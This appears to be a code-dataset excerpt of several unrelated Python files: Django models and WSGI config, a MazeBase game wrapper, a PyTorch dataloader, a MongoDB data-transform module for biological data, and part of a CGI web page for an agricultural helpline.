    email = models.EmailField(max_length=255, unique=True)
    name = models.CharField(max_length=255)
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    # Route object creation through the email-based manager defined above.
    objects = UserManager()
    # Tell Django's auth machinery to authenticate with ``email``.
    USERNAME_FIELD = 'email'
class Tag(models.Model):
    """Tag to be used for a recipe"""
    name = models.CharField(max_length=255)
    # Tags are owned per-user; deleting the user removes their tags.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
    )
    def __str__(self):
        # Human-readable representation used by the admin and shell.
        return self.name
class Ingredient(models.Model):
    """Ingredient to be used in a recipe"""
    name = models.CharField(max_length=255)
    # Ingredients are owned per-user; deleting the user removes them.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
    )
    def __str__(self):
        # Human-readable representation used by the admin and shell.
        return self.name
class Recipe(models.Model):
    """Recipe object"""
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )
    title = models.CharField(max_length=255)
    # Preparation time in minutes.
    time_minutes = models.IntegerField()
    # Up to 999.99 in whatever currency the deployment uses.
    price = models.DecimalField(max_digits=5, decimal_places=2)
    link = models.CharField(max_length=255, blank=True)
    ingredients = models.ManyToManyField('Ingredient')
    tags = models.ManyToManyField('Tag')
    # Uploaded images get a UUID filename via recipe_image_file_path.
    image = models.ImageField(null=True, upload_to=recipe_image_file_path)
    def __str__(self):
        return self.title
| 28.769231 | 76 | 0.672269 |
ca92bbb69c8ba17d47b2d85ad88906b0c03f21d8 | 3,392 | py | Python | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 48 | 2018-05-29T03:13:22.000Z | 2021-12-10T03:26:12.000Z | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 1 | 2018-07-20T15:11:46.000Z | 2018-07-20T22:50:33.000Z | SelfPlay/environment/mazebase_wrapper.py | denisergashbaev/memory-augmented-self-play | 7a916d5b7b622713465d570e810356ac72e8a74c | [
"MIT"
] | 7 | 2018-05-30T00:57:57.000Z | 2021-09-29T17:21:24.000Z | import random
from copy import deepcopy
import mazebase
# These weird import statements are taken from https://github.com/facebook/MazeBase/blob/23454fe092ecf35a8aab4da4972f231c6458209b/py/example.py#L12
import mazebase.games as mazebase_games
import numpy as np
from mazebase.games import curriculum
from mazebase.games import featurizers
from environment.env import Environment
from environment.observation import Observation
from utils.constant import *
class MazebaseWrapper(Environment):
    """
    Wrapper class over maze base environment
    """
    def __init__(self):
        """Create a curriculum-wrapped LightKey game on a fixed 10x10 map."""
        super(MazebaseWrapper, self).__init__()
        self.name = MAZEBASE
        try:
            # Reference: https://github.com/facebook/MazeBase/blob/3e505455cae6e4ec442541363ef701f084aa1a3b/py/mazebase/games/mazegame.py#L454
            small_size = (10, 10, 10, 10)
            lk = curriculum.CurriculumWrappedGame(
                mazebase_games.LightKey,
                curriculums={
                    'map_size': mazebase_games.curriculum.MapSizeCurriculum(
                        small_size,
                        small_size,
                        (10, 10, 10, 10)
                    )
                }
            )
            game = mazebase_games.MazeGame(
                games=[lk],
                featurizer=mazebase_games.featurizers.GridFeaturizer()
            )
        except mazebase.utils.mazeutils.MazeException as e:
            # NOTE(review): if this branch runs, ``game`` is never bound and
            # the assignment below raises NameError -- confirm intended.
            print(e)
        self.game = game
        self.actions = self.game.all_possible_actions()
    def observe(self):
        """Return the current state as an ``Observation`` with a flattened feature vector."""
        game_observation = self.game.observe()
        # Logic borrowed from:
        # https://github.com/facebook/MazeBase/blob/23454fe092ecf35a8aab4da4972f231c6458209b/py/example.py#L192
        obs, info = game_observation[OBSERVATION]
        featurizers.grid_one_hot(self.game, obs)
        obs = np.array(obs)
        featurizers.vocabify(self.game, info)
        # NOTE(review): looks like a typo -- the upstream example converts the
        # vocabified ``info`` here (``np.array(info)``); as written, ``obs`` is
        # concatenated with a copy of itself below. Confirm before changing.
        info = np.array(obs)
        game_observation[OBSERVATION] = np.concatenate((obs, info), 2).flatten()
        is_episode_over = self.game.is_over()
        return Observation(id=game_observation[ID],
                           reward=game_observation[REWARD],
                           state=game_observation[OBSERVATION],
                           is_episode_over=is_episode_over)
    def reset(self):
        """Reset the underlying game (best effort) and return the first observation."""
        try:
            self.game.reset()
        except Exception as e:
            print(e)
        return self.observe()
    def display(self):
        """Render the maze via the underlying game's display."""
        return self.game.display()
    def is_over(self):
        """Return True when the current episode has finished."""
        return self.game.is_over()
    def act(self, action):
        """Apply ``action`` to the game and return the resulting observation."""
        self.game.act(action=action)
        return self.observe()
    def all_possible_actions(self):
        """Return the action set cached at construction time."""
        return self.actions
    def set_seed(self, seed):
        # Not needed here as we already set the numpy seed
        pass
    def create_copy(self):
        """Return a deep copy of the wrapped game state (for snapshot/rollback)."""
        return deepcopy(self.game.game)
    def load_copy(self, env_copy):
        """Restore a game state previously produced by ``create_copy``."""
        self.game.game = env_copy
    def are_states_equal(self, state_1, state_2):
        """Element-wise equality test of two observed state arrays."""
        return np.array_equal(state_1, state_2)
if __name__ == "__main__":
    # Smoke test: take ten random actions and render the maze after each one.
    environment = MazebaseWrapper()
    environment.display()
    available_actions = environment.all_possible_actions()
    print(available_actions)
    for _ in range(10):
        print("==============")
        chosen = random.choice(available_actions)
        print(chosen)
        environment.act(chosen)
        environment.display()
| 30.836364 | 147 | 0.61763 |
f2726b3fa23251d76804d1a812ef90e4d7fde1dc | 1,130 | py | Python | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 210 | 2015-05-21T16:54:05.000Z | 2022-01-06T01:24:52.000Z | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 139 | 2015-05-15T11:01:03.000Z | 2022-03-29T21:13:04.000Z | testing/wsgi.py | theY4Kman/django-jinja | 03e05b6689582a0af4b82d93f188ecbcb7a85f23 | [
"BSD-3-Clause"
] | 84 | 2015-05-15T09:35:22.000Z | 2021-09-03T13:14:44.000Z | """
WSGI config for arandomtable project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# Point Django at the local ``settings`` module unless the process
# environment already names a settings module.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 43.461538 | 79 | 0.809735 |
07d15e5aa69e4f332786bdfe7264f9e99cc432cc | 3,593 | py | Python | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | null | null | null | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | 3 | 2021-06-08T21:05:26.000Z | 2022-01-13T02:23:20.000Z | dataloaders.py | hannesroth88/dermatologist-ai | 9b0222a88ca3f3c59bd2d6acd460fc42767c3dfb | [
"MIT"
] | null | null | null | import torch
from torchvision import datasets
import torchvision.transforms as transforms
from torch.utils.data.sampler import SubsetRandomSampler
# Set PIL to be tolerant of image files that are truncated.
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from config import Config as config
class DataLoaders(object):
    """Factory for train/valid/test ``DataLoader`` objects built from image folders."""

    def createDataloaders(self, config):
        """Return ``(loaders, dataset_sizes, class_names)`` for the splits in ``config.dirs``."""
        print('')
        print('####################')
        print('Create Dataloaders')
        print('####################')
        splits = ['train', 'valid', 'test']
        # ImageNet channel statistics, as in the official PyTorch example:
        # https://github.com/pytorch/examples/blob/42e5b996718797e45c46a25c55b031e6768f8440/imagenet/main.py#L89-L101
        normalizer = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                          std=[0.229, 0.224, 0.225])
        # Only the training split is augmented; valid/test use a
        # deterministic resize + center crop to a fixed 224x224 input.
        pipelines = {
            'train': transforms.Compose([
                transforms.Resize(256),
                transforms.RandomResizedCrop(224, scale=(0.08, 1), ratio=(1, 1)),
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor(),
                normalizer,
            ]),
        }
        for split in ('valid', 'test'):
            pipelines[split] = transforms.Compose([
                transforms.Resize(224),
                transforms.CenterCrop(224),  # keep a fixed 224x224 input size
                transforms.ToTensor(),
                normalizer,
            ])
        folders = {}
        for split in splits:
            folders[split] = ImageFolderWithPaths(root=config.dirs[split],
                                                  transform=pipelines[split])
        loaders = {}
        for split in splits:
            loaders[split] = torch.utils.data.DataLoader(folders[split],
                                                         batch_size=config.batch_size,
                                                         num_workers=config.num_workers,
                                                         shuffle=True)
        dataset_sizes = {}
        for split in splits:
            dataset_sizes[split] = len(folders[split])
        # Extra loader that yields single test samples (handy for per-image evaluation).
        loaders['test1by1'] = torch.utils.data.DataLoader(folders['test'],
                                                          batch_size=1,
                                                          num_workers=config.num_workers,
                                                          shuffle=True)
        class_names = folders['train'].classes
        print('Num of Images: ' + str(dataset_sizes))
        print('Num of classes: ', len(class_names), ' -> ', class_names)
        return loaders, dataset_sizes, class_names
class ImageFolderWithPaths(datasets.ImageFolder):
    """``ImageFolder`` variant whose items also carry the source file path.

    Each item becomes ``(image, target, path)`` instead of ``(image, target)``,
    so consumers of the DataLoader can trace a sample back to its file.
    """

    def __getitem__(self, index):
        """Return the parent's ``(image, target)`` tuple extended with the file path."""
        base_item = super(ImageFolderWithPaths, self).__getitem__(index)
        file_path = self.imgs[index][0]
        return base_item + (file_path,)
| 42.270588 | 121 | 0.569441 |
dc90d0d75024d784a9bfd9653dd52db8d0469f0b | 24,235 | py | Python | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 10 | 2018-11-20T17:04:09.000Z | 2021-08-24T18:29:06.000Z | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 59 | 2018-11-23T20:42:11.000Z | 2020-11-08T19:51:36.000Z | datanator/schema_2/transform.py | KarrLab/Kinetic-Datanator | 8aff047fd117033b98eca8ee3b21a8f07c430dec | [
"CC-BY-3.0",
"CC0-1.0",
"CC-BY-4.0",
"MIT"
] | 3 | 2018-12-15T00:53:54.000Z | 2021-08-24T18:29:08.000Z | from datanator_query_python.util import mongo_util
from datanator_query_python.config import config
import copy
import numpy as np
import re
class Transform(mongo_util.MongoUtil):
    def __init__(self,
                 MongoDB=None,
                 db=None,
                 des_col=None,
                 username=None,
                 password=None,
                 max_entries=float('inf'),
                 verbose=True):
        """Connect to MongoDB and record transformation settings.

        Args:
            MongoDB (:obj:`str`, optional): MongoDB server address.
            db (:obj:`str`, optional): name of the database to work in.
            des_col (:obj:`str`, optional): destination collection name.
            username (:obj:`str`, optional): database username.
            password (:obj:`str`, optional): database password.
            max_entries (:obj:`float`, optional): cap on the number of
                documents to process (defaults to no limit).
            verbose (:obj:`bool`, optional): whether to print progress.
        """
        super().__init__(MongoDB=MongoDB,
                         db=db,
                         username=username,
                         password=password)
        self.max_entries = max_entries
        # Destination collection for transformed documents.
        self.col = des_col
        self.db = db
        self.verbose = verbose
    def process_docs(self,
                     col,
                     db="datanator-test",
                     skip=0):
        """Transform every document of a source collection and upsert the results.

        Args:
            col(:obj:`str`): Name of the source collection
                ("uniprot", "rna_halflife_new" or "rna_modification").
            db(:obj:`str`): Name of the database holding the source collection.
            skip(:obj:`int`): NOTE(review): accepted but never applied to the
                cursor -- confirm whether it should be.
        """
        query = {}
        projection = {"_id": 0}
        # Full-collection scan; Mongo's _id is dropped from the source docs.
        docs = self.client[db][col].find(filter=query, projection=projection)
        for i, doc in enumerate(docs):
            if i == self.max_entries:
                break
            if i % 20 == 0 and self.verbose:
                print("Processing doc {}".format(i))
            if col == "uniprot":
                entity = self.build_uniprot_entity(doc)
                obs = self.build_uniprot_observation(doc)
                self.update_entity(entity,
                                   entity["identifiers"][0],
                                   db=self.db)
                # An empty dict means the document carried no abundance data.
                if obs != {}:
                    self.update_observation(obs,
                                            obs["source"][0])
            elif col == "rna_halflife_new":
                obs = self.build_rna_observation(doc)
                for ob in obs:
                    # Match an existing observation on identifier, source and environment.
                    _filter = {"$and": [{"identifier": ob["identifier"]},
                                        {"source": {"$elemMatch": ob["source"][0]}},
                                        {"environment": ob["environment"]}]}
                    self.update_observation(ob,
                                            ob["source"][0],
                                            db=self.db,
                                            query=_filter)
            elif col == "rna_modification":
                if doc.get("amino_acid") is None:
                    continue
                entity = self.build_rna_modification_entity(doc)
                obs = self.build_rna_modification_observation(doc)
                self.update_entity(entity,
                                   entity["identifiers"][0])
                for ob in obs:
                    # Rebinds the ``query`` name from above; harmless because it
                    # is rebuilt before every use here.
                    query = {"$and": [{"identifier": ob["identifier"]},
                                      {"genotype.taxon.ncbi_taxonomy_id": ob["genotype"]["taxon"]["ncbi_taxonomy_id"]}]}
                    self.update_observation(ob,
                                            ob["source"][0],
                                            query=query)
def build_uniprot_entity(self, obj):
"""Build entity from uniprot collection.
Args:
(:obj:`Obj`): object from which entity object will be built.
Return:
(:obj:`Obj`): entity object.
"""
_type = "protein"
identifiers = []
related = []
genotype = {}
name = obj.get("protein_name")
identifiers.append({"namespace": "uniprot_id",
"value": obj.get("uniprot_id")})
for o in obj.get("add_id"):
identifiers.append({"namespace": o.get("name_space"),
"value": o.get("value")})
canon_ancestors = []
for _id, name in zip(obj.get("canon_anc_ids"), obj.get("canon_anc_names")):
canon_ancestors.append({"ncbi_taxonomy_id": _id,
"name": name})
genotype["taxon"] = {"ncbi_taxonomy_id": obj.get("ncbi_taxonomy_id"),
"obj": obj.get("species_name"),
"canon_ancestors": canon_ancestors}
structures = [{"format": "canonical_sequence",
"value": obj.get("canonical_sequence")}]
mod = self.client["datanator-test"]["protein_modifications"].find({"uniprot_id": obj.get("uniprot_id")})
if mod is not None:
for o in mod:
if o.get("concrete") and np.isnan(o.get("monomeric_form_issues")) and np.isnan(o.get("pro_issues")):
identifiers.append({"namespace": "pro_id",
"value": o.get("pro_id")})
structures.append({"format": "processed_sequence_iubmb",
"value": o.get("processed_sequence_iubmb"),
"molecular_weight": o.get("processed_molecular_weight"),
"charge": o.get("processed_charge"),
"formula": o.get("processed_formula"),
"source": [{"namespace": "pro_id",
"value": o.get("pro_id"),
"level": "secondary"},
{"namespace": "doi",
"value": o.get("reference")["doi"],
"level": "primary"}]})
structures.append({"format": "modified_sequence_abbreviated_bpforms",
"value": o.get("modified_sequence_abbreviated_bpforms"),
"molecular_weight": o.get("modified_molecular_weight"),
"charge": o.get("modified_charge"),
"formula": o.get("modified_formula"),
"modification": {
"description": o.get("modifications"),
"formula": o.get("modifications_formula"),
"weight": o.get("modifications_molecular_weight"),
"charge": o.get("modifications_charge")
},
"source": [{"namespace": "pro_id",
"value": o.get("pro_id"),
"level": "secondary"},
{"namespace": "doi",
"value": o.get("reference")["doi"],
"level": "primary"}]})
structures.append({"format": "modified_sequence_bpforms",
"value": o.get("modified_sequence_bpforms")})
related.append({"namespace": "ec",
"value": obj.get("ec_number")})
identifiers.append({"namespace": "entrez_id",
"value": obj.get("entrez_id")})
identifiers.append({"namespace": "entry_name",
"value": obj.get("entry_name")})
related.append({"namespace": "gene_name",
"value": obj.get("gene_name")})
for n in obj.get("ko_name"):
related.append({"namespace": "ko_name",
"value": n})
related.append({"namespace": "ko_number",
"value": obj.get("ko_number")})
return {"type": _type,
"name": name,
"synonyms": [],
"identifiers": identifiers,
"related": related,
"genotype": genotype,
"structures": structures,
"schema_version": "2.0"}
def build_uniprot_observation(self, obj):
"""Build observation from uniprot collection.
Args:
(:obj:`Obj`): object from which observation object will be built.
Return:
(:obj:`Obj`): observation object.
"""
abundances = obj.get("abundances", [])
schema_version = "2.0"
result = {}
if len(abundances) == 0:
return result
else:
values = []
for a in abundances:
values.append({"type": "protein_abundance",
"value": a.get("abundance"),
"units": "ppm",
"organ": a.get("organ")})
entity = {"type": "protein",
"name": obj.get("protein_name"),
"identifiers": [{"namespace": "uniprot_id",
"value": obj.get("uniprot_id")}],
"schema_version": schema_version}
return {"entity": entity,
"values": values,
"source": [{"namespace": "paxdb",
"value": obj.get("uniprot_id")}],
"identifier": {"namespace": "uniprot_id",
"value": obj.get("uniprot_id")},
"schema_version": schema_version}
    def build_rna_observation(self, obj):
        """Build RNA half-life observation objects from the rna_halflife_new collection.

        Args:
            obj(:obj:`Obj`): object to be transformed.

        Return:
            (:obj:`list` of :obj:`Obj`): one observation per half-life record
            (or per cell-line time point for timecourse records).
        """
        result = []
        # Cell-line measurement columns look like "gm12878" (GM cell lines).
        pattern = r"^gm[\d]+"
        schema_version = "2.0"
        for life in obj.get("halflives"):
            entity = {"schema_version": schema_version}
            value = {"type": "rna_halflife"}
            environment = {}
            genotype = {}
            source = []
            related = []
            related.append({"namespace": "uniprot_id",
                            "value": obj.get("uniprot_id")})
            related.append({"namespace": "kegg_orthology_id",
                            "value": obj.get("ko_number")})
            entity["type"] = "RNA"
            entity["name"] = obj.get("protein_names")[0]
            entity["identifiers"] = [{"namespace": "uniprot_id",
                                      "value": obj.get("uniprot_id")}]
            values = []
            if life.get("transcript_size") is not None:
                entity["structures"] = []
            # Flat records: one measurement spread over scalar keys.
            if life.get("values") is None:
                for key, val in life.items():
                    if key == "unit":
                        value["units"] = val
                    elif key == "halflife":
                        value["value"] = float(val)
                    elif key == "ncbi_taxonomy_id": # protein entity includes taxon info
                        continue
                    elif key == "species_name":
                        continue
                    elif key == "reference":
                        for ref in val:
                            source.append({"namespace": list(ref.keys())[0],
                                           "value": list(ref.values())[0]})
                    elif key == "gene_name":
                        related.append({"namespace": key,
                                        "value": val})
                    elif key == "gene_symbol":
                        related.append({"namespace": key,
                                        "value": val})
                    elif key == "systematic_name":
                        entity["identifiers"].append({"namespace": key,
                                                      "value": val})
                    elif key == "accession_id":
                        # May be a single accession or a list of them.
                        if isinstance(val, str):
                            entity["identifiers"].append({"namespace": key,
                                                          "value": val})
                        elif isinstance(val, list):
                            for _id in val:
                                entity["identifiers"].append({"namespace": key,
                                                              "value": _id})
                    elif key == "variation_coefficient":
                        value["uncertainty"] = float(val)
                    elif key == "growth_medium":
                        environment["media"] = val
                    elif key == "ordered_locus_name":
                        entity["identifiers"].append({"namespace": key,
                                                      "value": val})
                    elif key == "doubling_time":
                        environment[key] = val
                    elif key == "r_squared":
                        value["uncertainty"] = float(val)
                    elif key == "standard_error":
                        value["uncertainty"] = float(val)
                    elif key == "transcript_size":
                        entity["structures"].append({"format": key,
                                                     "value": str(val)})
                    elif key == "cds_size":
                        entity["structures"].append({"format": key,
                                                     "value": str(val)})
                    elif key == "intron_size":
                        entity["structures"].append({"format": key,
                                                     "value": str(val)})
                    elif key == "genomic_size":
                        entity["structures"].append({"format": key,
                                                     "value": str(val)})
                    elif key == "intron_count":
                        entity["structures"].append({"format": key,
                                                     "value": str(val)})
                    elif key == "std":
                        value["uncertainty"] = float(val)
                    elif key == "ar_cog":
                        entity["identifiers"].append({"namespace": key,
                                                      "value": val})
                    elif key == "cog":
                        entity["identifiers"].append({"namespace": key,
                                                      "value": val})
                    elif key == "quantification_method":
                        environment["condition"] = "Quantified via {}.".format(val)
                values.append(value)
                result.append({"entity": entity,
                               "genotype": genotype,
                               "values": values,
                               "environment": environment,
                               "source": source,
                               "identifier": {"namespace": "uniprot_id",
                                              "value": obj.get("uniprot_id")},
                               "schema_version": schema_version,
                               "related": related})
            # Timecourse records keyed by cell line (e.g. "gm12878").
            else: #gmxxxxx
                val = life.get("values")
                # NOTE(review): drops the last character of accession_id
                # (version suffix?) -- confirm intent.
                entity["identifiers"].append({"namespace": "accession_id",
                                              "value": life.get("accession_id")[:-1]})
                related.append({"namespace": "gene_symbol",
                                "value": life.get("gene_symbol")})
                source = life.get("reference")
                for o in val:
                    value = {}
                    environment = {}
                    genotype = {}
                    for k, v in o.items():
                        if re.search(pattern, k):
                            # Convert to seconds, assuming the stored value is
                            # in hours (units are recorded as "s" below).
                            value["value"] = v * 3600.0
                            genotype["cellLine"] = k
                            value["units"] = "s"
                        elif k == "note":
                            environment["condition"] = v
                        elif k == "biological_replicates":
                            environment["replicate"] = v
                    result.append({"entity": entity,
                                   "genotype": genotype,
                                   "values": [value],
                                   "environment": environment,
                                   "source": source,
                                   "identifier": {"namespace": "uniprot_id",
                                                  "value": obj.get("uniprot_id")},
                                   "schema_version": schema_version,
                                   "related": related})
        return result
def build_rna_modification_entity(self, obj):
"""build entity objects from rna_modification collection
Args:
obj (:obj:`Obj`): Object from which entity will be built.
Return:
(:obj:`Obj`)
"""
entity = {"type": "RNA", "schema_version": "2.0",
"name": obj["definition"], "related": [],
"identifiers": []}
entity["related"].append({"namespace": "amino_acid",
"value": obj["amino_acid"]})
entity["related"].append({"namespace": "aa_code",
"value": obj["aa_code"]})
entity["related"].append({"namespace": "aa_name",
"value": obj["aa_name"]})
entity["related"].append({"namespace": "kegg_orthology_id",
"value": obj["kegg_orthology_id"]})
entity["related"].append({"namespace": "kegg_orthology_name",
"value": obj["kegg_gene_name"]})
entity["related"].append({"namespace": "kegg_pathway_id",
"value": obj["kegg_pathway_id"]})
entity["related"].append({"namespace": "kegg_pathway_name",
"value": obj["kegg_pathway_name"]})
entity["identifiers"].append({"namespace": "amino_acid",
"value": obj["amino_acid"]})
return entity
def build_rna_modification_observation(self, obj):
"""Build observation objects from rna_modification collection.
Args:
obj (:obj:`Obj`): object from which observation objects will be built.
Return:
(:obj:`list` of :obj:`Obj`)
"""
result = []
entity = self.build_rna_modification_entity(obj)
for mod in obj["modifications"]:
genotype = {}
values = []
entity["stuctures"] = []
identifier = {"namespace": "sequence_bpforms",
"value": mod["sequence_bpforms"]}
if mod["ncbi_taxonomy_id"] is None:
genotype["taxon"] = self.build_taxon_object(mod["organism"], _format="tax_name")
else:
genotype["taxon"] = self.build_taxon_object(mod["ncbi_taxonomy_id"])
genotype["organ"] = mod["organellum"]
entity["stuctures"].append({"format": "sequence_modomics",
"value": mod["sequence_modomics"]})
entity["stuctures"].append({"format": "sequence_bpforms",
"value": mod["sequence_bpforms"]})
entity["stuctures"].append({"format": "sequence_iupac",
"value": mod["sequence_iupac"]})
values.append({"type": "length",
"value": mod["length"]})
values.append({"type": "anticodon",
"value": mod["anticodon"]})
values.append({"type": "number_of_modifications",
"value": mod["number_of_modifications"]})
values.append({"type": "number_of_modified_a",
"value": mod["number_of_modified_a"]})
values.append({"type": "number_of_modified_u",
"value": mod["number_of_modified_u"]})
values.append({"type": "number_of_modified_c",
"value": mod["number_of_modified_c"]})
values.append({"type": "number_of_modified_g",
"value": mod["number_of_modified_g"]})
values.append({"type": "formula",
"value": mod["formula"]})
values.append({"type": "molecular_weight",
"value": mod["molecular_weight"]})
values.append({"type": "charge",
"value": mod["charge"]})
values.append({"type": "canonical_formula",
"value": mod["canonical_formula"]})
values.append({"type": "canonical_molecular_weight",
"value": mod["canonical_molecular_weight"]})
values.append({"type": "canonical_charge",
"value": mod["canonical_charge"]})
values.append({"type": "bpforms_errors",
"value": mod["bpforms_errors"]})
source = [{"namespace": "doi",
"value": mod["reference"]["doi"]}]
result.append({"entity": entity,
"values": values,
"genotype": genotype,
"source": source,
"identifier": identifier,
"schema_version": "2.0"})
return result
    def build_sabio_entity(self, obj):
        """Build entity objects from sabio_rk_old collection.

        NOTE(review): this method looks unfinished -- it returns ``None``
        (no return statement), the ``entity`` dict is initialized but never
        populated or used, and the trailing ``parameter`` loop is empty.
        Confirm before relying on it.

        Args:
            obj (:obj:`Obj`): object from which entity objects will be built.
        Return:
            (:obj:`Obj`)
        """
        entity = {"type": "reaction"}
        structures = [{"format": "reaction_equation", "enzyme": {"subunit": []}}]
        identifiers = []
        related = []
        source = []
        related.append({"namespace": "kinlaw_id",
                        "value": obj.get("kinlaw_id")})
        resources = obj.get("resource", [{}])
        for r in resources:
            for key, val in r.items():
                if key == "pubmed":
                    source.append({"namespace": key,
                                   "value": val})
                elif key == "ec-code":
                    related.append({"namespace": "ec_code",
                                    "value": val})
                elif key == "sabiork.reaction":
                    identifiers.append({"namespace": "sabio_rxn_id",
                                        "value": val})
                else:
                    # Unrecognized resource keys are logged for manual triage.
                    with open("edgecase.txt", "a+") as f:
                        f.write("Kinetic law {} has more info in resources".format(obj["kinlaw_id"]))
        enzymes_list = obj["enzymes"]
        for e in enzymes_list:
            if e.get("subunit") is not None:
                for i, su in enumerate(e.get("subunit")):
                    structures[0]["enzyme"]["subunit"].append({"namespace": "uniprot_id",
                                                               "value": su.get("uniprot_id"),
                                                               "coefficient": su.get("subunit_coefficient")})
            elif e.get("enzyme") is not None:
                # NOTE(review): each iteration overwrites name/id, so only the
                # last enzyme entry survives -- confirm intent.
                for i, en in enumerate(e.get("enzyme")):
                    structures[0]["enzyme"]["name"] = e.get("enzyme")[i]["enzyme_name"]
                    structures[0]["enzyme"]["id"] = e.get("enzyme")[i]["enzyme_id"]
            elif e.get("compartment") is not None:
                for i, en in enumerate(e.get("compartment")):
                    structures[0]["enzyme"]["compartment"] = e.get("compartment")[i]["compartment_name"]
        parameters = obj["parameter"]
        for p in parameters:
            pass
def main():
    # Placeholder CLI entry point; wire up Transform(...) calls here.
    pass
if __name__ == "__main__":
main() | 49.866255 | 124 | 0.417908 |
c7148b6fe938885b7ae45ebdd10814dadcb30270 | 5,449 | py | Python | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | #!C:/Users/KowsRaji/AppData/Local/Programs/Python/Python37/python.exe
# Emit the CGI response header before any HTML output.
# NOTE(review): the header looks malformed -- the conventional form is
# "Content-type: text/html\r\n\r\n"; confirm what the deployed server accepts.
print("content-type:html \r\n\r\n")
import cgi,os
import cgitb; cgitb.enable()  # shows tracebacks in the browser; disable in production
import pymysql as ps
form = cgi.FieldStorage()
# Get filename here.
# ``pid`` is untrusted user input and is interpolated into HTML links later
# in this script -- it should be validated/escaped before use.
pid = form.getvalue("id")
# NOTE(review): hard-coded root credentials with an empty password; move
# these to configuration.
conn=ps.connect("localhost","root","","myproject")
cur=conn.cursor()
print("""
<html>
<head>
<title>Agriofficer page</title>
<link rel="icon" type="images/ico" href="images/icon.jpg">
<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="bootstrap/styleTV.css">
<script src="bootstrap/jquery/jquery.min.js"></script>
<script src="bootstrap/js/bootstrap.min.js"></script>
<script language="javascript" type="text/javascript" src="username.js"></script>
<link rel="icon" type="image/ico" href="images/tv_logo.png">
<script type="text/javascript">
$(function()
{
$(this).bind('contextmenu',function()
{
return false;
})
})
</script>
</head>
<body>
<div id="header">
<div class="w3-container w3-teal">
<nav class="navbar navbar-inverse" style="background-color:transparent;border:none;">
<div class="container-fluid">
<div class="row">
<div class="col-sm-2">
<img src="images/agrilogo.jpg" class="img-responsive img-circle" style="margin-top:8px;">
</div>
<div class="col-sm-6">
<p id="font_head">AGRI HELPLINE SYSTEM</p>
</div>
<div class="col-sm-4">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
<span class="icon-bar"></span>
<span class="icon-bar "></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"></a>
</div>
<div class="collapse navbar-collapse" id="myNavbar" style="float:right;">
<ul class="nav navbar-nav" style="padding:20px;color:white;">
<li style="padding-left:5px;padding-top:10px;color:red;" id="font_menu"><p id="name">agri_officer</p></li>
<li style="padding-left:5px;"><a href="agri_homepage.py" id="font_menu"><span class="glyphicon glyphicon-log-out"></span>  Logout</a></li>
</ul>
</div>
</div>
</div>
</div>
</nav>
</div>
</div>
<!-- Body content-->
<div id="content_body">
<!-- Dashboard -->
<div id="throbber" style="display:none; min-height:120px;"></div>
<div id="noty-holder"></div>
<div id="wrapper">
<div class="collapse navbar-collapse navbar-ex1-collapse" role="navigation">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="http://cijulenlinea.ucr.ac.cr/dev-users/"></a>
</div>
<ul class="nav navbar-nav side-nav">
<li>
<a href="student_profile.py?id=%s" data-toggle="collapse" data-target="#submenu-1" id="font_dash"><i class="fa fa-fw fa-search"></i>Profile<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:100px;"></span></a>
</li>
<li>
